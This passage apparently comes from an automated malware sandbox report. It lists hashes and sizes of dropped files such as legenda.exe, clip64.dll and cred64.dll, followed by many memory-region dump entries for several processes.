                              SHA256

                              42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                              SHA512

                              90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                            • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              Filesize

                              235KB

                              MD5

                              5086db99de54fca268169a1c6cf26122

                              SHA1

                              003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                              SHA256

                              42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                              SHA512

                              90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                            • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              Filesize

                              235KB

                              MD5

                              5086db99de54fca268169a1c6cf26122

                              SHA1

                              003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                              SHA256

                              42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                              SHA512

                              90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                            • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              Filesize

                              235KB

                              MD5

                              5086db99de54fca268169a1c6cf26122

                              SHA1

                              003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                              SHA256

                              42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                              SHA512

                              90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                            • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              Filesize

                              235KB

                              MD5

                              5086db99de54fca268169a1c6cf26122

                              SHA1

                              003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                              SHA256

                              42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                              SHA512

                              90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                            • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
                              Filesize

                              89KB

                              MD5

                              16cf28ebb6d37dbaba93f18320c6086e

                              SHA1

                              eae7d4b7a9636329065877aabe8d4f721a26ab25

                              SHA256

                              c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

                              SHA512

                              f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

                            • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
                              Filesize

                              89KB

                              MD5

                              16cf28ebb6d37dbaba93f18320c6086e

                              SHA1

                              eae7d4b7a9636329065877aabe8d4f721a26ab25

                              SHA256

                              c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

                              SHA512

                              f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

                            • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
                              Filesize

                              89KB

                              MD5

                              16cf28ebb6d37dbaba93f18320c6086e

                              SHA1

                              eae7d4b7a9636329065877aabe8d4f721a26ab25

                              SHA256

                              c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

                              SHA512

                              f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

                            • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
                              Filesize

                              223B

                              MD5

                              94cbeec5d4343918fd0e48760e40539c

                              SHA1

                              a049266c5c1131f692f306c8710d7e72586ae79d

                              SHA256

                              48eb3ca078da2f5e9fd581197ae1b4dfbac6d86040addbb305e305c014741279

                              SHA512

                              4e92450333d60b1977f75c240157a8589cfb1c80a979fbe0793cc641e13556004e554bc6f9f4853487dbcfcdc2ca93afe610649e9712e91415ed3f2a60d4fec0

                            • memory/1640-199-0x0000000004F80000-0x0000000004F90000-memory.dmp
                              Filesize

                              64KB

                            • memory/1640-184-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-204-0x0000000004F80000-0x0000000004F90000-memory.dmp
                              Filesize

                              64KB

                            • memory/1640-167-0x00000000007F0000-0x000000000081D000-memory.dmp
                              Filesize

                              180KB

                            • memory/1640-168-0x0000000004F90000-0x0000000005534000-memory.dmp
                              Filesize

                              5.6MB

                            • memory/1640-169-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-170-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-172-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-174-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-176-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-178-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-180-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-182-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-205-0x0000000000400000-0x000000000071D000-memory.dmp
                              Filesize

                              3.1MB

                            • memory/1640-186-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-190-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-188-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-192-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-194-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-196-0x0000000002620000-0x0000000002632000-memory.dmp
                              Filesize

                              72KB

                            • memory/1640-197-0x0000000004F80000-0x0000000004F90000-memory.dmp
                              Filesize

                              64KB

                            • memory/1640-198-0x0000000004F80000-0x0000000004F90000-memory.dmp
                              Filesize

                              64KB

                            • memory/1640-200-0x0000000000400000-0x000000000071D000-memory.dmp
                              Filesize

                              3.1MB

                            • memory/1640-202-0x0000000004F80000-0x0000000004F90000-memory.dmp
                              Filesize

                              64KB

                            • memory/1640-203-0x0000000004F80000-0x0000000004F90000-memory.dmp
                              Filesize

                              64KB

                            • memory/1980-161-0x0000000000A00000-0x0000000000A0A000-memory.dmp
                              Filesize

                              40KB

                            • memory/2260-1779-0x000002D26DAE0000-0x000002D26DAF0000-memory.dmp
                              Filesize

                              64KB

                            • memory/2260-1665-0x000002D26DAF0000-0x000002D26DB12000-memory.dmp
                              Filesize

                              136KB

                            • memory/2260-2716-0x000002D26DAE0000-0x000002D26DAF0000-memory.dmp
                              Filesize

                              64KB

                            • memory/2260-2715-0x000002D26DAE0000-0x000002D26DAF0000-memory.dmp
                              Filesize

                              64KB

                            • memory/2260-2714-0x000002D26DAE0000-0x000002D26DAF0000-memory.dmp
                              Filesize

                              64KB

                            • memory/2260-1782-0x000002D26DAE0000-0x000002D26DAF0000-memory.dmp
                              Filesize

                              64KB

                            • memory/2392-1175-0x0000000000320000-0x0000000000894000-memory.dmp
                              Filesize

                              5.5MB

                            • memory/2392-1330-0x00000000051B0000-0x00000000051C0000-memory.dmp
                              Filesize

                              64KB

                            • memory/2392-1331-0x0000000005160000-0x0000000005161000-memory.dmp
                              Filesize

                              4KB

                            • memory/2468-1784-0x0000017F4DA40000-0x0000017F4DA50000-memory.dmp
                              Filesize

                              64KB

                            • memory/2468-1980-0x0000017F4DA40000-0x0000017F4DA50000-memory.dmp
                              Filesize

                              64KB

                            • memory/2468-1785-0x0000017F4DA40000-0x0000017F4DA50000-memory.dmp
                              Filesize

                              64KB

                            • memory/2468-2717-0x0000017F4DA40000-0x0000017F4DA50000-memory.dmp
                              Filesize

                              64KB

                            • memory/2468-2718-0x0000017F4DA40000-0x0000017F4DA50000-memory.dmp
                              Filesize

                              64KB

                            • memory/2468-2719-0x0000017F4DA40000-0x0000017F4DA50000-memory.dmp
                              Filesize

                              64KB

                            • memory/2484-1140-0x0000000000D10000-0x0000000000D42000-memory.dmp
                              Filesize

                              200KB

                            • memory/2484-1141-0x0000000005890000-0x00000000058A0000-memory.dmp
                              Filesize

                              64KB

                            • memory/4372-2712-0x0000000000400000-0x0000000000418000-memory.dmp
                              Filesize

                              96KB

                            • memory/4372-2713-0x0000000005640000-0x0000000005650000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-1125-0x0000000006000000-0x0000000006066000-memory.dmp
                              Filesize

                              408KB

                            • memory/4376-1124-0x0000000005F60000-0x0000000005FF2000-memory.dmp
                              Filesize

                              584KB

                            • memory/4376-1120-0x0000000005B50000-0x0000000005C5A000-memory.dmp
                              Filesize

                              1.0MB

                            • memory/4376-1121-0x0000000005C60000-0x0000000005C72000-memory.dmp
                              Filesize

                              72KB

                            • memory/4376-1122-0x0000000005C80000-0x0000000005CBC000-memory.dmp
                              Filesize

                              240KB

                            • memory/4376-279-0x0000000000800000-0x000000000084B000-memory.dmp
                              Filesize

                              300KB

                            • memory/4376-282-0x0000000004E70000-0x0000000004E80000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-280-0x0000000004E70000-0x0000000004E80000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-1123-0x0000000004E70000-0x0000000004E80000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-243-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-241-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-239-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-237-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-235-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-233-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-231-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-215-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-1119-0x0000000005530000-0x0000000005B48000-memory.dmp
                              Filesize

                              6.1MB

                            • memory/4376-1128-0x0000000006B40000-0x000000000706C000-memory.dmp
                              Filesize

                              5.2MB

                            • memory/4376-1127-0x0000000006960000-0x0000000006B22000-memory.dmp
                              Filesize

                              1.8MB

                            • memory/4376-210-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-229-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-211-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-227-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-213-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-1134-0x0000000007370000-0x00000000073C0000-memory.dmp
                              Filesize

                              320KB

                            • memory/4376-1133-0x00000000072E0000-0x0000000007356000-memory.dmp
                              Filesize

                              472KB

                            • memory/4376-1132-0x0000000004E70000-0x0000000004E80000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-1131-0x0000000004E70000-0x0000000004E80000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-1130-0x0000000004E70000-0x0000000004E80000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-1129-0x0000000004E70000-0x0000000004E80000-memory.dmp
                              Filesize

                              64KB

                            • memory/4376-225-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-223-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-221-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-219-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB

                            • memory/4376-217-0x0000000004D00000-0x0000000004D3E000-memory.dmp
                              Filesize

                              248KB